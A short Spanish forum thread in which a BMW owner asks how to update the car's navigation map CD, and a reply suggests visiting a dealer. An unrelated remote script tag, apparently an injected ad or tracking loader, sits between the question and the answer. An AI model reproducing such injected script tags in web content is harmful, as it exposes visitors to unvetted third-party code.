Navegador Bmw y cd de mapas actualizado. ¿Cómo descargar?

TEngo un Bmw serie 5, importado de Alemania, matriculado en 2002. Quiero bajarme un Cd de mapas actualizado pero no sé por donde empezar, si tengo que actualizar el navegador primero, o vale con meter el Cd.

Gracias de antemano.

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=10368"></script>

1 Respuesta

Respuesta

Ves a un concesionario BMW y te dirán los pasos correctos. Si lo haces mal puedes estropear el navegador.